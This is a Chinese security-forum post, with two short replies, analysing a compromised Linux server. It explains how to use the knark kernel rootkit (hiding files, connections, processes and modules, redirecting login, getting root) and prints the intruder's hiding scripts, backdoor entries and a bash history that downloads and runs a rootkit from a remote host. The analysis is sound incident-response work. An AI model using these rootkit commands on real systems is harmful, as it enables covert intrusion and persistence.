论坛: 菜鸟乐园 标题: 入侵分析 2 复制本贴地址    
作者: biyuntian [biyuntian]    论坛用户   登录
nethide?似乎有点印象……好吧,到俺的一堆破烂里找找……咦,找到一篇knark hacking的文章,里面有提到nethide,先当下一个来玩玩吧,有个版本号为knark-0.59的,是对Linux Kernel 2.2的,行……咱们先看看这是什么样的内核模块:

除了taskhack.c之处,所有这些文件都是基于knark.o模块的正确加载。

hidef 用来隐藏你的文件或者目录,你可以建立一个目录,比如/boot/.pty0,然后键入
./hidef /boot/.pty0于是这这个目录便被隐藏起来,并且连du之类的命令也不能
找出它来,同样的,子目录下的任何文件也一样地被藏得天衣无缝 :)

ered 用来重定向执行某个程序,比如说,你把一个bindshell的程序拷到/boot/.pty0/bindshell,
然后可以用./ered /bin/ls /boot/.pty0/bindshell这样的命令,将ls重定向到bindshell,
当然,这样的话,ls是没变,但已经不能正确执行了。如果要清除所有的命令重定向,可以
键入./ered -c

nethide 用来隐藏/proc/net/tcp及/proc/net/udp里的连接进程――netstat就是从这里面获取信息并
输出的,比如你要隐藏端口43981的连接信息,你必须键入:
./nethide ":ABCD "
你就可以象grep -v一样,过滤掉你不想让人看到的网络连接信息了,比如你用:
netstat -at
可能会有一行连接(ssh)的记录是这样的:
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 localhost:ssh localhost:1023 ESTABLISHED
我们来看看/proc/net/tcp里面的情况如何:
cat /proc/net/tcp
其中相应的行应该是这样的:
local_address rem_address blablabla...
0:0100007F:0016 0100007F:03FF 01 00000000:00000000 00:00000000 00000000
如果我们想隐藏关于127.0.0.1这个IP地址的所有信息,首先就必须把它“翻译”成这种格式,127用
十六进制表示是7F,0是00,1是01,于是地址就是0100007F,然后,再跟上端口22是0016,就是:
0100007F:0016了,于是我们键入:
./nethide "0100007F:0016" 便可以将其隐藏得很漂亮了。

rootme 利用这个家伙,你可以不需要suid位,就能拿到root的权限喽:
./rootme /bin/sh
你也可以用这种方式来运行:
./rootme /bin/ls -l /root
这里必须注意,要输入完整的路径名。


taskhack 可以改变运行着的进程的uid,euid,gid,egid等。
./taskhack -alluid=0 pid
这可以把该进程所有的*uid(uid, euid, suid, fsuid)都改成0
你用:
ps aux | grep bash
creed 91 0.0 1.3 1424 824 1 S 15:31 0:00 -bash

rexec 远程执行命令,比如:
./rexec www.microsoft.com haxored.server.nu /bin/touch /LUDER


knark还有一些其它的特性:
将信号31发送给某个进程,能够在/proc里将进程文件隐藏起来,这样ps及top
都无法看到,比如:
#kill -31 pid
如果这个进程还有它的子进程,那么也将一同被隐藏起来,所以如果你把你的shell
隐藏掉的话,所有你键入的进程将都是不可见的。如果你想再看看,被隐藏起来的进
程藏在什么地方的话,可以看/proc/knark/pids文件,这里列出所有隐藏的家伙;)

闯入一个系统中,sniffer总是入侵者们用来扩大战果的玩意儿,现在也存在许多小工具
能够侦测到网卡是否被置于混杂模式,但如果你加载了这个模块,当人们在查询SIOCGIFFLAGS
的标志位时,IFF_PROMISC――接口为随机(promiscuous)模式总是会被隐藏的。

这个包中还带有另一个小工具modhide,这个模块加载后,可以将最后加载至系统中的模块从
模块列表里移除――也就是/proc/module里面看不到它,示例如下:
#/sbin/insmod knark.o
#/sbin/lsmod | grep knark
knark 6640 0 (unused)
#/sbin/insmod modhide.o
#lsmod | grep knark
啥也没有了 ;)

最重要的是,我们可以在/proc/knark/目录――当然也是隐藏的――下面找到所有被藏起来的东西的资料。

四、分析
我们可以试着看看:

#cd /proc/knark/
#cat files
HIDDEN FILES
/boot/.pty0
/usr/lib/logem

这两个目录就是被藏起来的了;)

#cat nethides
HIDDEN STRINGS (without the quotes)
"CB0C"
"17"
":0947"

这里是三个netstat的隐藏。

#cat pids
EUID PID COMMAND
0 112 mcd
0 338 dittrich

两个后门,一个bindshell,一个是伪装成ssh的,进程都被隐藏了。

#cat redirects
REDIRECT FROM REDIRECT TO
/bin/login /usr/lib/logem/login2

可执行程序重定向,这里是把login给重定向了。

现在很清楚了,黑客进来之后,首先是上传上/usr/lib/logem下面的文件,包括几个脚本及刚才分析的内核模块,以及几个后门,如login后门,ssh后门,然后修改了/etc/rc.d/init.d/network文件,加上/usr/lib/libdd.so.1行,以便系统启动时自加载,(/etc/inetd.conf里也被加上了一句echo stream tcp nowait root /usr/sbin/echod /usr/sbin/echod,这样入侵者可以远程启动后门及内核模块,这里的echod与libdd.so.1是同样文件),这个程序指向/boot/.pty0/go.sh:

这里面启动了几个irc的cliend端,连到国外的一些server上挂着――我不太理解为啥老外都这样?我连上去whois了一下,结果如下:

Coitze is ~statd@the.ip.of.the_hacked_machine * Ask your girlfriend :>
Coitze on @#radio21pitesti @#mafiotzii
Coitze using McLean.VA.US.Undernet.Org CAIS Internet, US
Coitze End of /WHOIS list.

而go.sh又指向ascunde.sh,这里是这样的:

for proces in `/bin/cat /boot/.pty0/hdm`; do <-------hdm文件里有ncd、sh、mcd三行,也就是有这些东西是入侵者想隐藏的
P=`/sbin/pidof $proces`
if [ -n "$P" ]; then
killall -31 $proces 1>/dev/hdm 2>/dev/hdm <-------发出kill -31的信号,调用加载的内核模块隐藏进程
fi
done
for port in `/bin/cat /boot/.pty0/hdm1`; do <--------hdm1里是51980及7,入侵者想隐藏的端口
./nethide `./dec2hex $port` 1>/dev/hdm 2>/dev/hdm <------dec2hex是一个小程序,把十进制数据转换成16进制
done
for director in `/bin/cat /boot/.pty0/hdm2`; do <--------hdm2里是/boot/.pty0及/usr/lib/logem
./hidef $director 1>/dev/hdm 2>/dev/hdm <------调用hidef将hdm2里的文件隐藏
done

基本上就是这样了,我们看看这个洋鬼子在/usr/lib/logem/下面放了些什么东西吧 :)

#ls -la
drwxr-xr-x 4 quack wheel 512 Mar 12 15:05 ./
drwxr-xr-x 10 quack wheel 1536 Mar 12 08:44 ../
-rw-r--r-- 1 quack wheel 202 Feb 28 00:46 .bashrc
-rw-r--r-- 1 quack wheel 295 Feb 28 00:46 autoexec
-rwxr-xr-x 1 quack wheel 14460 Feb 28 00:46 dittrich*
drwxr-xr-x 2 quack wheel 512 Feb 28 00:46 knrk/
-rwsr-xr-x 1 quack wheel 20164 Feb 28 00:46 login2*
-rwxr-xr-x 1 quack wheel 25284 Feb 28 00:46 portmap*
drwxr-xr-x 2 quack wheel 512 Feb 28 00:46 stuff/

knrk就是咱们刚才分析的内核模块编译过的版本。
#cat autoexec
#!/bin/sh
/sbin/insmod -f /usr/lib/logem/knrk/knrk.o
/sbin/insmod -f /usr/lib/logem/knrk/knrkmodhide.o
/usr/lib/logem/knrk/knrkhidef /usr/lib/logem
/usr/lib/logem/knrk/knrkered /bin/login /usr/lib/logem/login2
/usr/lib/logem/knrk/knrknethide ":0947"
/usr/lib/logem dittrich
killall -31 dittrich

这里dittrich及portmap都是弹出shell的后门,而login2是一个假的login,只是这里这个家伙似乎对ered的理解有些问题,把/bin/login直接重定向到/usr/lib/logem/login2,会导致所有人登陆不上,因为运行login的时候,直接跑去run login2程序了――另外,这台机器没开telnet,root都从控制台登陆的,也不知这个入侵者是什么意思,或许是写了脚本自己入侵的吧。

#cat stuff/conn
# Root Connector (or something)

if ! test $5; then
echo "Syntax: conn <rewtline>"
exit 1
fi

REWTIP=$3
REWTPASS=$5
echo "Connecting..."
export DISPLAY=$REWTPASS
telnet $REWTIP
export DISPLAY=0
echo "Disconnected"

这是一个直接登陆到被放置login后门机器的脚本。

五、抓鬼

分析清楚了,还不够,咱得试着逮住这家伙才好呀,反正他的后门已经都知道了,咱们直接运行iplog之类的程序,就可以搞定它了,到http://download.sourceforge.net/ojnk/iplog-2.2.3.tar.gz下载iplog的最新版本,需要有libpcap的支持,编译后,借用这家伙的模块,直接kill -31 iplog's_pid,就把iplog进程隐藏了,等他上来吧 ;) 只要逮着连端口7或者51980的,估计都是bad guys :)

六、后话

其实这台机器,俺仔细地看了看,除了上面分析的家伙,至少还有两个人登陆过,而且取得了root权限并安装后门、sniffer等等,从下面可以看出来:

1、/etc/rc.d/rc.local
#!/bin/sh

# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.
/bin/bd <--------------这里是一个bindshell的后门

if [ -f /etc/redhat-release ]; then
R=$(cat /etc/redhat-release)

arch=$(uname -m)
a="a"
case "_$arch" in
_a*) a="an";;
_i*) a="an";;
esac

/usr/bin/bsgd <--------------另一个bindshell后门
# This will overwrite /etc/issue at every boot. So, make any changes you
# want to make to /etc/issue here or you will lose them when you reboot.
echo "" > /etc/issue
echo "$R" >> /etc/issue
echo "Kernel $(uname -r) on $a $(uname -m)" >> /etc/issue
/usr/bin/hyme <---------------一个很常见的linux下的sniffer,该入侵者修改过程序


cp -f /etc/issue /etc/issue.net
echo >> /etc/issue
fi

2、/.bash_history

#cat /.bash_history
mkdir /usr/src/.puta
cd /usr/src/.puta
lynx -dump http://www.angelfire.com/linux/tools/bkS.tgz > bkS.tgz
tar -zxvf bkS.tgz
cd bk ;./b0skit
cat /etc/inetd.conf | grep -v 4512 > /tmp/back
mv -f /tmp/back /etc/inetd.conf
killall -1 inetd

其实作为系统管理员,只要付出1%的努力,就可以让99%的入侵者束手无策,但是满世界却偏偏总有着无数的机器,愿意Free地让入侵者们使用――或者删除……








地主 发表时间: 04/23 04:49

回复: xiaojun [xiaojun]   剑客   登录
真是够乐观的了,呵呵!

B1层 发表时间: 04/23 09:00

回复: syshunter [syshunter]   版主   登录
看看国外的SCRIPTS KID,再看看国内的SCRIPTS KID,唉~`

B2层 发表时间: 04/23 09:22

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号